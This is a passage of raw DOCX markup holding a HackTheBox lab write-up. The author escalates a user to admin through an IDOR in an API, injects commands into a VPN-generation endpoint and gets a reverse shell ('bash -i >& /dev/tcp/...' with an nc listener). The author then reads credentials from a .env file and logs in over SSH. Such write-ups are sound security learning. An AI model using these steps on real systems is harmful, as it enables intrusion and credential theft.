                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5660027" cy="3143250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCA18D" w14:textId="77777777" w:rsidR="00367F31" w:rsidRDefault="00367F31" w:rsidP="00572446"/>
    <w:p w14:paraId="05B14DC4" w14:textId="37FDC141" w:rsidR="00367F31" w:rsidRDefault="00367F31" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">After obtaining the code, I simply went ahead and created a profile/user on this website. </w:t>
      </w:r>
      <w:r w:rsidR="00A94719">
        <w:t>And went to login page. And we are in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02FE00" w14:textId="22EE9CD0" w:rsidR="00CB402B" w:rsidRDefault="00CB402B" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3702A5B7" wp14:editId="0CB7922E">
            <wp:extent cx="4126977" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="548285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85154" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4130014" cy="3479183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96B2A2" w14:textId="3C9DD49A" w:rsidR="00CB402B" w:rsidRDefault="001D132F" w:rsidP="00572446">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The next step from here is to explore what options and what buttons we can click on. I first when to the access tab, since </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hackthebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> told me to go ahead and look in that direction, so I go ahead and </w:t>
      </w:r>
      <w:r w:rsidR="00D51B33">
        <w:t xml:space="preserve">look for other </w:t>
      </w:r>
      <w:r w:rsidR="007A4773">
        <w:t xml:space="preserve">website </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A4773">
        <w:t>urls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D51B33">
        <w:t xml:space="preserve"> I can possibly go to. What do I mean by this, I simply go ahead and change the ending of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D51B33">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D51B33">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D51B33">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4773">
        <w:t>/v1/user/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A4773">
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4773">
        <w:t>/generate to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A4773">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4773">
        <w:t xml:space="preserve">/v1/admin because at the end of the day that’s what we want. </w:t>
      </w:r>
      <w:r w:rsidR="00945D22">
        <w:t xml:space="preserve">And nothing, it returns us an error. So </w:t>
      </w:r>
      <w:r w:rsidR="00664190">
        <w:t>instead,</w:t>
      </w:r>
      <w:r w:rsidR="00945D22">
        <w:t xml:space="preserve"> I go ahead and delete more leaving </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00945D22">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00945D22">
        <w:t>/v1</w:t>
      </w:r>
      <w:r w:rsidR="00664190">
        <w:t xml:space="preserve">(sidenote this took around 10 min just to keep going at it, just trial and error). After that I </w:t>
      </w:r>
      <w:r w:rsidR="00474E60">
        <w:t xml:space="preserve">found something that gave me something. It was </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00474E60">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00474E60">
        <w:t xml:space="preserve">/v1. This showed me </w:t>
      </w:r>
      <w:r w:rsidR="00283D00">
        <w:t xml:space="preserve">some requests that I can potentially ask for. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF445F" w14:textId="4A89CCF3" w:rsidR="00DC1229" w:rsidRDefault="00DC1229" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="238859E6" wp14:editId="06B4C8B8">
            <wp:extent cx="4713598" cy="3886200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="868444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44932" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4719366" cy="3890955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="649849E7" w14:textId="6460B787" w:rsidR="0021318F" w:rsidRDefault="0021318F" w:rsidP="00572446">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I go ahead and grab my friend </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and go ahead and make some requests. </w:t>
      </w:r>
      <w:r w:rsidR="004860E5">
        <w:t xml:space="preserve">To do this simply open up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004860E5">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004860E5">
        <w:t xml:space="preserve"> again, go to proxy, turn on intercept, and refresh the page. This should give you a request and you will want to send it to repeater again because we want to see what those admin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004860E5">
        <w:t>urls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004860E5">
        <w:t xml:space="preserve"> are going to lead us to. </w:t>
      </w:r>
      <w:r w:rsidR="00B467DB">
        <w:t xml:space="preserve">Now that we got that, I focused on </w:t>
      </w:r>
      <w:r w:rsidR="00BB6A20">
        <w:t xml:space="preserve">the admin requests we can possibly make. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8D0DB" w14:textId="15BAFAA7" w:rsidR="000E4A27" w:rsidRDefault="000E4A27" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="412E94B0" wp14:editId="7147307D">
            <wp:extent cx="5093531" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121266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6614" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5094968" cy="2820195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAAF8D0" w14:textId="71F5AE70" w:rsidR="000E4A27" w:rsidRDefault="000E4A27" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">I go ahead and replace the GET header with something like </w:t>
      </w:r>
      <w:r w:rsidR="00174EA1">
        <w:t>PUT /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00174EA1">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00174EA1">
        <w:t>/v1/admin/setting/update</w:t>
      </w:r>
      <w:r w:rsidR="00DC4291">
        <w:t xml:space="preserve">. Since my though process is I want to get admin and to do this I would like to make my user an admin. The way to this, at least I thought is like make my user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DC4291">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DC4291">
        <w:t xml:space="preserve"> admin by changing the value to true, however I didn’t really know how to approach it. </w:t>
      </w:r>
      <w:r w:rsidR="00477C0B">
        <w:t xml:space="preserve">So here I pulled the walkthrough that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00477C0B">
        <w:t>hackthebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00477C0B">
        <w:t xml:space="preserve"> had and </w:t>
      </w:r>
      <w:r w:rsidR="003A5CC1">
        <w:t xml:space="preserve">started watching it at the </w:t>
      </w:r>
      <w:r w:rsidR="000B7658">
        <w:t xml:space="preserve">22:30 mark. It began by teaching me that the application type was not right however for me it looked like I never had my content type </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000B7658">
        <w:t>specified</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000B7658">
        <w:t xml:space="preserve"> and my connection was stay alive. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000B7658">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000B7658">
        <w:t xml:space="preserve"> I went ahead and changed those things and </w:t>
      </w:r>
      <w:r w:rsidR="00E65152">
        <w:t>created a content type so I can see what messages are coming back. He then went on to explain that</w:t>
      </w:r>
      <w:r w:rsidR="00586197">
        <w:t xml:space="preserve"> the error message was asking for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00586197">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00586197">
        <w:t xml:space="preserve"> email then it asked for admin value. I went ahead and </w:t>
      </w:r>
      <w:r w:rsidR="008405BE">
        <w:t xml:space="preserve">put the email line and admin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008405BE">
        <w:t>line</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008405BE">
        <w:t xml:space="preserve"> and it gave me root. He classified it as an IDOR vulnerability. </w:t>
      </w:r>
      <w:r w:rsidR="00223123">
        <w:t>Which I went to look up what specifically that meant,</w:t>
      </w:r>
      <w:r w:rsidR="003061DC">
        <w:t xml:space="preserve"> and according to google it mentions that the IDOR is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003061DC">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003061DC">
        <w:t xml:space="preserve"> insecure direct object references. </w:t>
      </w:r>
      <w:r w:rsidR="00760AB0">
        <w:t xml:space="preserve">“This type of access control vulnerability that arises when an application uses user-supplied input to access objects </w:t>
      </w:r>
      <w:r w:rsidR="00AB2A23">
        <w:t>directly” (</w:t>
      </w:r>
      <w:r w:rsidR="004D7AFF">
        <w:t>google)</w:t>
      </w:r>
      <w:r w:rsidR="00760AB0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00035210">
        <w:t xml:space="preserve"> Below is the picture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163FEDF" w14:textId="6B163162" w:rsidR="00003030" w:rsidRDefault="00003030" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D715A30" wp14:editId="0EDE9D96">
            <wp:extent cx="6086475" cy="3504275"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1151573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3623" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6099932" cy="3512023"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61B6D9" w14:textId="77777777" w:rsidR="00003030" w:rsidRDefault="00003030" w:rsidP="00572446"/>
    <w:p w14:paraId="2C94A531" w14:textId="0471150E" w:rsidR="00003030" w:rsidRDefault="00290E48" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">My next approach is to check the last </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> page it has for admin, so I go ahead and create an admin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> generate request, and it looks like it works now since I have the user an admin</w:t>
      </w:r>
      <w:r w:rsidR="00261266">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43465F51" w14:textId="6F0E6014" w:rsidR="00261266" w:rsidRDefault="00261266" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1588C77E" wp14:editId="35ACF61C">
            <wp:extent cx="5216901" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="2051692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92693" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5219864" cy="2983018"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594C7BD" w14:textId="5FF49BE4" w:rsidR="00261266" w:rsidRDefault="00261266" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">Sweet! Now I just need to add a username parameter. I go ahead and type in my current user, joe. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269F2354" w14:textId="493FFAD0" w:rsidR="008D663B" w:rsidRDefault="008D663B" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB729FD" wp14:editId="305508D1">
            <wp:extent cx="5943600" cy="3296920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="888225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25774" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3296920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4960082C" w14:textId="77777777" w:rsidR="008D663B" w:rsidRDefault="008D663B" w:rsidP="00572446"/>
    <w:p w14:paraId="44E75917" w14:textId="2A1DA361" w:rsidR="008D663B" w:rsidRDefault="008D663B" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">Sweet I can get a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> generated for my user. </w:t>
      </w:r>
      <w:r w:rsidR="00EF6D60">
        <w:t xml:space="preserve">Now to see if we can create command injections to it. I first begin my checking my ID. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B87C92" w14:textId="25F5E6C0" w:rsidR="00C42810" w:rsidRDefault="00C42810" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A2116A" wp14:editId="0B6AC8FB">
            <wp:extent cx="5943600" cy="3312160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1587240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0838" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3312160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448ECBA" w14:textId="07FF884E" w:rsidR="00C42810" w:rsidRDefault="00C42810" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">Seems to work, so now that I know that anything after my username can be used to pull back what I want. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the next process is to get a shell. I look up how to do this, and the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">result is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000F77B3">
        <w:t>pretty simple</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000F77B3">
        <w:t>. Bash -I &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F77B3">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="008B5F6F">
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B5F6F">
        <w:t xml:space="preserve">/my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B5F6F">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B5F6F">
        <w:t xml:space="preserve"> address/port 0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="00960A65">
        <w:t xml:space="preserve">. But before I send this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00960A65">
        <w:t>code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00960A65">
        <w:t xml:space="preserve"> I have to create a port where I am going to listen, to do this I go on my host computer (kali) and do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00960A65">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00960A65">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00960A65">
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00960A65">
        <w:t xml:space="preserve"> 1234. It will now be listening for anything on 1234. </w:t>
      </w:r>
      <w:r w:rsidR="00DD3A71">
        <w:t xml:space="preserve"> I go ahead and try the Bash </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DD3A71">
        <w:t>line</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD3A71">
        <w:t xml:space="preserve"> and it doesn’t work. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DD3A71">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD3A71">
        <w:t xml:space="preserve"> I go back and look online what to do. </w:t>
      </w:r>
      <w:r w:rsidR="00B02E90">
        <w:t xml:space="preserve">It said that I need to do base 64 encrypt. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B02E90">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B02E90">
        <w:t xml:space="preserve"> I go look at the write up on exactly what they meant because I have never done this before. Which now that I look at it, makes sense. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1ACD3D" w14:textId="58B49347" w:rsidR="00153FBF" w:rsidRDefault="00153FBF" w:rsidP="00572446">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A82894A" wp14:editId="14DFA0E4">
            <wp:extent cx="5943600" cy="3315970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="790751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51858" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3315970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DC528" w14:textId="7DDD0AB1" w:rsidR="00C53985" w:rsidRDefault="00C53985" w:rsidP="00572446">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> go, I got a shell.</w:t>
      </w:r>
      <w:r w:rsidR="00B63AB1">
        <w:t xml:space="preserve"> Form here I obviously want to see what is in the files, so I go ahead and check through </w:t>
      </w:r>
      <w:r w:rsidR="00233B35">
        <w:t xml:space="preserve">what is there. Just in case I made sure I checked for hidden files as well. The next step I looked at was to look at the .env file. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00233B35">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00233B35">
        <w:t xml:space="preserve"> I go ahead and cat into the .env file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B426EC6" w14:textId="0484C049" w:rsidR="00507928" w:rsidRDefault="00507928" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D160FF" wp14:editId="03CD760A">
            <wp:extent cx="4873720" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1426179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79329" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4876293" cy="3840602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212C725" w14:textId="4F6CB1F9" w:rsidR="00507928" w:rsidRDefault="00507928" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">Boom we get a username and password. I go ahead and take note of that and may be able to use it to get through ssh. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009D02E4">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009D02E4">
        <w:t xml:space="preserve"> I go ahead and spin up another shell and ssh into the admin, </w:t>
      </w:r>
      <w:r w:rsidR="004C4543">
        <w:t xml:space="preserve">the command I used is as follows: ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="004C4543" w:rsidRPr="00FE1312">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>admin@10.10.11.221</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004C4543">
        <w:t xml:space="preserve"> followed by the password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F8F9F" w14:textId="7CBE934B" w:rsidR="00E14B7D" w:rsidRDefault="00E14B7D" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">Boom we are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I simply see what files are here and there is a user.txt file that I opened. We got the first flag. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E5849" w14:textId="4C6A3C74" w:rsidR="004661F1" w:rsidRDefault="004661F1" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="229E01D6" wp14:editId="6E5E3E0C">
            <wp:extent cx="5943600" cy="4648835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104528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4074" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4648835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
